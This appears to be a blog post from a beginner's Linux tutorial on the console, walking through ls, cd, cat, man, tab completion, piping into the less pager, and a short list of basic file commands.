Once you are well situated, it?s time to get into the heart and power
of Linux: the console. The next session will guide you through it and
set you on the path to finding out how to do stuff for yourself. You
will (probably) want to start learning to rely less and less on the
GUI and figure out how to do everything through the console (try
launching all your programs from the console, for example).

V. The Console

The Console might look familiar to DOS if you?ve ever used it. The
prompt should look something like the following:

AvatharTri@localhost avathartri$

With the blinking _ following it. This can vary greatly as it is fully
customizable. Let?s get started with the commands.

First, let?s explore the file system. The command ls will "list" the
files in the current directory. Here?s an example:

AvatharTri@localhost avathartri$ ls

It should then display the contents of the current directory if there
are any. Almost all commands have options attached to them. For
example, using the -l option, which is short for "long" will display
more information about the files listed.

AvatharTri@localhost avathartri$ ls -l

We will get into how to find out the options for commands and what
they do later.

The second command to learn will be the cd command, or "change
directory". To use it, you type cd followed by a space and the
directory name you wish to go into. In Linux, the top directory is /
(as opposed to C:\ in Windows). Let?s get there by using this command:

AvatharTri@localhost avathartri$ cd /
AvatharTri@localhost /$

Now, we are in the top directory. Use the ls command you learned
earlier to see everything that?s here. You should see several items,
which are directories. Now, let?s go into the home directory:

AvatharTri@localhost /$ cd home
AvatharTri@localhost home$

And you can now ls and see what?s around. In Linux there are some
special symbol shortcuts for specific folders. You can use these
symbols with cd, ls, or several other commands. The symbol ~ stands
for your home folder. One period . represents the directory your
currently in. Two periods .. represent the directory immediately above
your own. Here?s an example of the commands:

AvatharTri@localhost home$ cd ~
AvatharTri@localhost avathartri$

This moved us to our user?s personal directory.

AvatharTri@localhost avathartri$ cd .
AvatharTri@localhost avathartri$ cd ..
AvatharTri@localhost home$

The cd .. moved us up to the home directory.
As you?ve probably noticed by now, the section behind the prompt
changes as you change folders, although it might not always be the
case as it?s up to the personal configuration.

You can use these symbols with the ls command also to view what is in
different folders:

AvatharTri@localhost home$ ls ~
AvatharTri@localhost home$ ls ..

And you can view what is in a folder by specifying its path:

AvatharTri@localhost home$ ls /
AvatharTri@localhost home$ ls /home

The last command we will cover as far as finding your way around the
filesystem is the cat command. The cat command will show the contents
of a file. Find a file by using the cd and ls commands and then view
its contents with the cat command.

AvatharTri@localhost home$ cd [directory]
AvatharTri@localhost [directory]$ ls
AvatharTri@localhost [directory]$ cat [filename]

Where [directory] is the directory you want to view and [filename] is
the name of the file you want to view. Omit the brackets. Now, if the
file you viewed was a text file, you should see text, but if it wasn?t,
you might just see jumbled garbage, but this is ok. If the file goes
by too fast and goes off the screen, don?t worry, we will get to how
to scroll through it later.

One of the most useful commands is the man command, which displays the
"manual" for the command you want to know more about. To learn more
about the ls command:

AvatharTri@localhost home$ man ls

And you will see the manual page for ls. It displays the syntax, a
description, options, and other useful tidbits of information. Use the
up and down arrows to scroll and press q to exit. You can view the
manual pages for any command that has one (most commands do). Try this
out with all the commands that you know so far:

AvatharTri@localhost home$ man cd
AvatharTri@localhost home$ man cat
AvatharTri@localhost home$ man man

One very crucial option to the man command is the -k option. This will
search the descriptions of manual pages for the word you specify. You
can use this to find out what command to do what you need to do. For
example, let?s say we want to use a text editor:

AvatharTri@localhost home$ man -k editor

And you should see a list of apps with a short description and the
word "editor" in the description.

With a blank prompt, you can hit tab twice for Linux to display all
the possible commands. For Linux to display all the commands beginning
with a certain letter or series of letters, type those letters and hit
tab twice.

Note: This is actually a function of BASH and not Linux, but BASH is
the default Linux shell.

Now that you know a little about moving around the filesystem and
viewing manual pages, there is one more trick that we will cover to
help you out. Remember how the man pages were scrollable as in you
could use the arrow keys to scroll up and down? That is because the
man pages use something called the less pager. We?re not going to go
into what this does exactly and how it works, but that?s definitely
something that you will want to look up. Here?s how to use the less
pager with a file:

AvatharTri@localhost home$ cat [filename] | less

That uses something called a pipe. The line is the vertical line above
enter on your keyboard. Briefly, what this does is take the output
from the cat command, and stick it in the less pager. By doing this,
you can view files that would normally run off the screen and scroll
up and down.

Some final commands to check out:

mkdir - make directories
cp - copy file
mv - move file
rm - remove file
rmdir - remove directory
grep - search a file for a keyword
pwd - display current working directory
top - display system resources usage (kill the program with control + c)

Blog Archive